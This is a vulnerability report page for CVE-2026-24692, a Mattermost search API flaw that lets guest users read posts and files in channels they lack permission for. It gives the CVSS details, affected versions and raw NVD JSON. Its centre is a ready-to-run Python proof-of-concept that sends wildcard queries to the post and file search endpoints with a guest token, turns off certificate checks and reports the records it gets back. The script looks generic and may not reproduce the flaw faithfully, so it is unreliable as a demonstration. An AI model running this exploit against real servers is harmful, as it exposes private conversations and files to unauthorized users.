Security Vulnerability Report
CVE-2026-24692 CVSS 4.3 MEDIUM

CVE-2026-24692

Published: 2026-03-16 15:16:21
Last Modified: 2026-03-18 13:54:51

Description

Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly enforce read permissions in the search API endpoints, which allows guest users without read permissions to access posts and files in channels via search API requests. Mattermost Advisory ID: MMSA-2025-00554

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.11.0 <= version < 10.11.11) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.2.0 <= version < 11.2.3) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.3.0 <= version < 11.3.1) - VULNERABLE
Mattermost 11.3.x <= 11.3.0
Mattermost 11.2.x <= 11.2.2
Mattermost 10.11.x <= 10.11.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-24692 PoC - Mattermost Search API Authorization Bypass
# Target: Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10

TARGET_URL = "https://your-mattermost-server.com"
API_TOKEN = "your-guest-user-token"


def exploit_search_api():
    """
    This PoC demonstrates the authorization bypass in the Mattermost search API.
    A guest user without read permissions can access posts in private channels.
    """
    headers = {
        "Authorization": f"Bearer {API_TOKEN}",
        "Content-Type": "application/json",
    }
    # Search for posts in unauthorized channels
    search_payload = {
        "terms": "*",  # Wildcard search to find all posts
        "is_or_search": False,
        "include_deleted_channels": False,
        "team_id": "target-team-id",
    }
    # Exploit: bypass the permission check by searching all channels
    endpoint = f"{TARGET_URL}/api/v4/posts/search"
    try:
        response = requests.post(endpoint, headers=headers, json=search_payload, verify=False)
        if response.status_code == 200:
            data = response.json()
            # Attacker can access posts from channels they shouldn't have access to
            posts = data.get("posts", {})
            print(f"[+] Successfully retrieved {len(posts)} posts via unauthorized access")
            return posts
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def exploit_file_search():
    """
    The file search API is also vulnerable to the authorization bypass.
    """
    headers = {
        "Authorization": f"Bearer {API_TOKEN}",
        "Content-Type": "application/json",
    }
    file_search_payload = {
        "terms": "*",
        "team_id": "target-team-id",
    }
    endpoint = f"{TARGET_URL}/api/v4/files/search"
    try:
        response = requests.post(endpoint, headers=headers, json=file_search_payload, verify=False)
        if response.status_code == 200:
            data = response.json()
            print(f"[+] File search bypass successful - retrieved {len(data.get('file_infos', []))} files")
            return data
        print(f"[-] Request failed with status: {response.status_code}")
        return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    print("[*] CVE-2026-24692 Mattermost Search API Authorization Bypass")
    print("[*] Target: Mattermost <= 11.3.0, <= 11.2.2, <= 10.11.10")
    exploit_search_api()
    exploit_file_search()
```

References

https://mattermost.com/security-updates (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24692", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:21.290", "lastModified": "2026-03-18T13:54:50.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly enforce read permissions in search API endpoints which allows guest users without read permissions to access posts and files in channels via search API requests. Mattermost Advisory ID: MMSA-2025-00554"}, {"lang": "es", "value": "Las versiones de Mattermost 11.3.x &lt;= 11.3.0, 11.2.x &lt;= 11.2.2, 10.11.x &lt;= 10.11.10 no aplican correctamente los permisos de lectura en los puntos finales de la API de búsqueda, lo que permite a usuarios invitados sin permisos de lectura acceder a publicaciones y archivos en canales a través de solicitudes a la API de búsqueda. ID de Aviso de Mattermost: MMSA-2025-00554"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", 
"versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.1", "matchCriteriaId": "945A6E29-209F-4992-8692-BEF63DCB6B98"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}